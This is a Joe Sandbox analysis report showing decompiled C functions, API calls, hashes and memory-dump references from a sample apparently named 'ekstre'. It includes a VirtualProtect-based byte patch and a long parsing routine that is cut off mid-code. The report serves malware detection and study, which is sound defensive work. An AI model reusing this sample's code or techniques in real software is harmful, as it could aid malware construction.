Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: fbce0aff252bace43849c95ebebe2e1cda83fcc66daa53378426a8730234c3de
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: A2E0EC3221465AEBDF109F65DC00AEB7BACEB05360F004437FE95E3190D635EA219BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00405E3F Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E3F(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e43
0x00405e53
0x00405e5b
0x00000000
0x00405e62
0x00000000
0x00405e64

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403345,00000000,00000000,00403192,000000FF,00000004,00000000,00000000,00000000), ref: 00405E53

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction ID: a636cb505d38f976cb5b33cdadc1a4ea33a35a9b3076bf32ff3daa33d1af8648
Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction Fuzzy Hash: F8E0B63221025AABDF109F65DC00AEB7B6CEB057E4F084436B995E2150D631E9619AE5

Uniqueness

Uniqueness Score: -1.00%

Function 6DE819C7 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6de85014 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6de8501c, 4, 0x40, 0x6de85034); // executed
					 *0x6de8501c = 0xc2;
					 *0x6de85034 = 0;
					 *0x6de85030 = 0;
					 *0x6de8502c = 0;
					 *0x6de85028 = 0;
					 *0x6de85024 = 0;
					 *0x6de85020 = 0;
					 *0x6de8501e = 0;
				}
				return 1;
			}

0x6de819d0
0x6de819d5
0x6de819e5
0x6de819ed
0x6de819f4
0x6de819fa
0x6de81a00
0x6de81a06
0x6de81a0c
0x6de81a12
0x6de81a18
0x6de81a18
0x6de81a21

APIs

VirtualProtect.KERNELBASE(6DE8501C,00000004,00000040,6DE85034), ref: 6DE819E5

Memory Dump Source

Source File: 00000000.00000002.1181790668.000000006DE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6DE80000, based on PE: true

Associated: 00000000.00000002.1181679975.000000006DE80000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181869899.000000006DE84000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181977025.000000006DE86000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de80000_ekstre.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: eb058a055b14c687e4b859330d4ef63333e23a631a787ac7c5456e56dda98207
Instruction ID: 8c4e8edc117e20176c6fbaff88488b1d67a9ae614afc2f1cd1879358eae48479
Opcode Fuzzy Hash: eb058a055b14c687e4b859330d4ef63333e23a631a787ac7c5456e56dda98207
Instruction Fuzzy Hash: CCF0A5B49593C0DECB198F2895447393EF0B71B346B10492EF24BDA359CF304100AB9E

Uniqueness

Uniqueness Score: -1.00%

Function 004060BA Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060BA(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406039(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004060c4
0x004060cb
0x004060de
0x00000000
0x004060de
0x004060cf
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,007BDF00,007BDF00,?,007BDF00,?,00406148,?,?,-00008098,-00008098,00000002,-00008098), ref: 004060DE

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 7af025afa92f6299d5ed017748240f958724f187594f0c9acf2bdd87a83aae65
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: 2FD0123204020DBBDF119F909D01FAB375DAB08750F018426FE06A40A1D775D530A728

Uniqueness

Uniqueness Score: -1.00%

Function 004042FD Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042FD(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x7c1f38;
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004042fd
0x00404304
0x0040430f
0x00000000
0x0040430f
0x00404315

APIs

SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040430F

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 01ff8a972dc02d9d6b300943d9eb12c7c434b7691702030cc07fb77b951fcae2
Instruction ID: d5fde84f55c96a854f3b8e64bcd39996ee62205787155fcfdd86f6366728d343
Opcode Fuzzy Hash: 01ff8a972dc02d9d6b300943d9eb12c7c434b7691702030cc07fb77b951fcae2
Instruction Fuzzy Hash: 59C048B1744604BBEA208B609E49F0677A8AB90B00F64842DB640B60E1DA78E420EA2C

Uniqueness

Uniqueness Score: -1.00%

Function 00403348 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403348(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403356
0x0040335c

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030D1,?,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00403356

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Function 004042E6 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042E6(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x7c5f68, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004042f4
0x004042fa

APIs

SendMessageA.USER32(00000028,?,00000001,00404116), ref: 004042F4

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 879dab8adba2f9aa78ce493a825e568d84b0fc3c6a624ff37d4c52904f736a2e
Instruction ID: 7e251da369cce2a0c70c0416880034a7dcf795692c70faff6064ed152339fd79
Opcode Fuzzy Hash: 879dab8adba2f9aa78ce493a825e568d84b0fc3c6a624ff37d4c52904f736a2e
Instruction Fuzzy Hash: ABB09235184A04ABDA114B10DE09F457AA2A764701F00802CB240240F0CAB200A0EB08

Uniqueness

Uniqueness Score: -1.00%

Function 004042D3 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042D3(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x7b0d64, _a4); // executed
				return _t2;
			}

0x004042dd
0x004042e3

APIs

KiUserCallbackDispatcher.NTDLL(?,004040AF), ref: 004042DD

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 4c8031cc7c32e63a26b9072e6b21cab50e0cc99040d0d4d2a2a1aa64b3ab23f1
Instruction ID: a0e4dc20e7d708fddb33ac6da319dcbfa590644fed3cd152995165668b477e78
Opcode Fuzzy Hash: 4c8031cc7c32e63a26b9072e6b21cab50e0cc99040d0d4d2a2a1aa64b3ab23f1
Instruction Fuzzy Hash: CDA002755445409BCA115F50DF05D077B61A7947017018579A1459007487755460EB59

Uniqueness

Uniqueness Score: -1.00%

Function 6DE812C6 Relevance: 1.3, APIs: 1, Instructions: 4
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE812C6() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x6de85040); // executed
				return _t1;
			}

0x6de812ce
0x6de812d4

APIs

GlobalAlloc.KERNELBASE(00000040,6DE811C4,-000000A0), ref: 6DE812CE

Memory Dump Source

Source File: 00000000.00000002.1181790668.000000006DE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6DE80000, based on PE: true

Associated: 00000000.00000002.1181679975.000000006DE80000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181869899.000000006DE84000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181977025.000000006DE86000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de80000_ekstre.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: ca5c7d8460726fda58a611c08c7ada9685f3e30ec6ee6146af9b2b9b5e5bb90a
Instruction ID: 49ab4d3edfee9a5bd8d3e681630f0c9ddd1f9a86a9abd88db6e0f6c9970f07a3
Opcode Fuzzy Hash: ca5c7d8460726fda58a611c08c7ada9685f3e30ec6ee6146af9b2b9b5e5bb90a
Instruction Fuzzy Hash: 47A002715401809BDF425B90EA1EF393AB7F74B707F740045E306690949B790410DB56

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6DE82288 Relevance: 25.2, APIs: 13, Strings: 1, Instructions: 667
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6DE82288() {
				CHAR* _t236;
				void* _t238;
				signed int _t239;
				char _t240;
				char _t241;
				void _t242;
				CHAR* _t243;
				void* _t249;
				struct HINSTANCE__* _t250;
				CHAR* _t251;
				int _t252;
				CHAR* _t253;
				signed short _t255;
				CHAR* _t259;
				void* _t260;
				CHAR** _t261;
				intOrPtr _t264;
				void* _t272;
				signed int _t273;
				CHAR* _t274;
				CHAR* _t276;
				CHAR* _t279;
				CHAR* _t282;
				void _t283;
				signed int _t287;
				void* _t288;
				void* _t291;
				CHAR* _t298;
				signed int _t299;
				CHAR* _t303;
				CHAR* _t305;
				CHAR* _t306;
				CHAR* _t307;
				CHAR* _t312;
				CHAR* _t313;
				char _t319;
				CHAR* _t320;
				char _t323;
				signed int _t333;
				void* _t335;
				CHAR* _t336;
				CHAR* _t337;
				void _t338;
				CHAR* _t341;
				CHAR* _t343;
				signed int _t345;
				signed int _t346;
				void* _t347;
				void* _t348;
				void* _t349;
				signed int _t355;
				CHAR* _t360;
				void* _t361;
				signed int _t368;
				signed int _t369;
				CHAR* _t370;
				void* _t371;
				CHAR* _t377;
				signed int _t379;
				CHAR* _t380;
				void* _t382;
				void* _t383;
				CHAR* _t384;
				CHAR* _t385;
				CHAR* _t386;
				CHAR* _t387;
				struct HINSTANCE__* _t388;
				CHAR* _t390;
				void* _t391;
				void* _t392;

				 *(_t392 + 0x1c) = 0;
				_t382 = 0;
				 *(_t392 + 0x34) = 0;
				 *(_t392 + 0x30) = 0;
				 *(_t392 + 0x18) = 0;
				 *(_t392 + 0x2c) = 0;
				 *(_t392 + 0x3c) = 0;
				 *(_t392 + 0x28) = 0;
				_t236 = E6DE812C6();
				 *(_t392 + 0x14) = _t236;
				_t312 = _t236;
				 *(_t392 + 0x38) = E6DE812C6();
				_t238 = E6DE8152B();
				_t391 = _t238;
				 *(_t392 + 0x44) = _t238;
				_t383 = _t238;
				 *(_t392 + 0x24) = _t391;
				 *((intOrPtr*)(_t392 + 0x48)) = 2;
				_t239 = 0;
				while(1) {
					_t368 = _t239;
					 *(_t392 + 0x40) = _t368;
					if(_t239 != 0 && _t382 == 0) {
						break;
					}
					_t240 =  *_t391;
					 *((char*)(_t392 + 0x13)) = _t240;
					_t241 = _t240;
					_t319 = _t241;
					if(_t319 == 0) {
						_t169 = _t392 + 0x1c;
						 *_t169 =  *(_t392 + 0x1c) | 0xffffffff;
						__eflags =  *_t169;
						L132:
						_t369 = _t368;
						if(_t369 == 0) {
							_t370 = 0;
							 *_t312 = 0;
							__eflags = _t382;
							if(_t382 == 0) {
								_t382 = GlobalAlloc(0x40, 0x14a4);
								_t370 = 0;
								__eflags = 0;
								 *(_t382 + 0x810) = 0;
								 *(_t382 + 0x814) = 0;
							}
							_t242 =  *(_t392 + 0x34);
							_t177 = _t382 + 8; // 0x8
							_t320 = _t177;
							_t178 = _t382 + 0x408; // 0x408
							_t384 = _t178;
							 *_t382 = _t242;
							 *_t320 = _t370;
							 *_t384 = _t370;
							 *(_t382 + 0x808) = _t370;
							 *(_t382 + 0x80c) = _t370;
							 *(_t382 + 4) = _t370;
							_t243 = _t242 - _t370;
							__eflags = _t243;
							if(_t243 == 0) {
								__eflags = _t312 -  *(_t392 + 0x14);
								if(_t312 ==  *(_t392 + 0x14)) {
									goto L154;
								}
								_t390 = _t370;
								GlobalFree(_t382);
								_push( *(_t392 + 0x14));
								_t382 = E6DE81326();
								__eflags = _t382;
								if(_t382 == 0) {
									goto L154;
								} else {
									goto L147;
								}
								while(1) {
									L147:
									_t272 =  *(_t382 + 0x14a0);
									__eflags = _t272;
									if(_t272 == 0) {
										break;
									}
									_t390 = _t382;
									_t382 = _t272;
								}
								__eflags = _t390;
								if(_t390 != 0) {
									_t187 =  &(_t390[0x14a0]);
									 *_t187 = _t390[0x14a0] & 0x00000000;
									__eflags =  *_t187;
								}
								_t273 =  *(_t382 + 0x810);
								__eflags = _t273 & 0x00000008;
								if((_t273 & 0x00000008) == 0) {
									_t333 = 2;
									_t274 = _t273 | _t333;
									__eflags = _t274;
									 *(_t382 + 0x810) = _t274;
								} else {
									_t382 = E6DE812D5(_t382);
									 *(_t382 + 0x810) =  *(_t382 + 0x810) & 0xfffffff5;
								}
								goto L154;
							} else {
								_t276 = _t243 - 1;
								__eflags = _t276;
								if(_t276 == 0) {
									L143:
									lstrcpyA(_t320,  *(_t392 + 0x38));
									L144:
									lstrcpyA(_t384,  *(_t392 + 0x14));
									L154:
									_t312 =  *(_t392 + 0x14);
									L155:
									_t239 =  *(_t392 + 0x1c);
									_t391 = _t391 + 1;
									 *(_t392 + 0x24) = _t391;
									_t383 = _t391;
									if(_t239 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t279 = _t276 - 1;
								__eflags = _t279;
								if(_t279 == 0) {
									goto L144;
								}
								__eflags = _t279 != 1;
								if(_t279 != 1) {
									goto L154;
								}
								goto L143;
							}
						}
						_t371 = _t369 - 1;
						if(_t371 == 0) {
							_t282 =  *(_t392 + 0x30);
							if( *(_t392 + 0x2c) == _t371) {
								_t282 = _t282 - 1;
							}
							 *(_t382 + 0x814) = _t282;
						}
						goto L154;
					}
					_t335 = _t319 - 0x23;
					if(_t335 == 0) {
						_t336 =  *(_t392 + 0x1c);
						__eflags = _t383 -  *(_t392 + 0x44);
						if(_t383 <=  *(_t392 + 0x44)) {
							L29:
							__eflags =  *(_t392 + 0x28);
							if( *(_t392 + 0x28) != 0) {
								L15:
								_t337 = _t336;
								__eflags = _t337;
								if(_t337 == 0) {
									_t283 =  *((intOrPtr*)(_t392 + 0x13));
									while(1) {
										__eflags = _t283 - 0x22;
										if(_t283 != 0x22) {
											break;
										}
										_t391 = _t391 + 1;
										__eflags =  *(_t392 + 0x28);
										_t383 = _t391;
										if( *(_t392 + 0x28) == 0) {
											__eflags = 1;
											 *(_t392 + 0x28) = 1;
											L121:
											 *_t312 =  *_t391;
											_t312 =  &(_t312[1]);
											goto L155;
										}
										_t157 = _t392 + 0x28;
										 *_t157 =  *(_t392 + 0x28) & 0x00000000;
										__eflags =  *_t157;
										_t283 =  *_t391;
									}
									__eflags = _t283 - 0x2a;
									if(_t283 == 0x2a) {
										_t287 = 2;
										 *(_t392 + 0x34) = _t287;
										L129:
										_t385 =  *(_t392 + 0x14);
										L130:
										_t312 = _t385;
										goto L155;
									}
									__eflags = _t283 - 0x2d;
									if(_t283 == 0x2d) {
										L117:
										_t338 =  *_t391;
										__eflags = _t338 - 0x2d;
										if(_t338 != 0x2d) {
											L122:
											_t162 = _t391 + 1; // 0x1
											_t288 = _t162;
											__eflags =  *_t288 - 0x3a;
											if( *_t288 != 0x3a) {
												goto L121;
											}
											__eflags = _t338 - 0x2d;
											if(_t338 == 0x2d) {
												goto L121;
											}
											__eflags = 1;
											 *(_t392 + 0x34) = 1;
											L125:
											_t385 =  *(_t392 + 0x14);
											_t391 = _t288;
											__eflags = _t312 - _t385;
											if(_t312 <= _t385) {
												 *( *(_t392 + 0x38)) = 0;
											} else {
												 *_t312 = 0;
												lstrcpyA( *(_t392 + 0x3c), _t385);
											}
											goto L130;
										}
										_t159 = _t383 + 1; // 0x1
										_t288 = _t159;
										__eflags =  *_t288 - 0x3e;
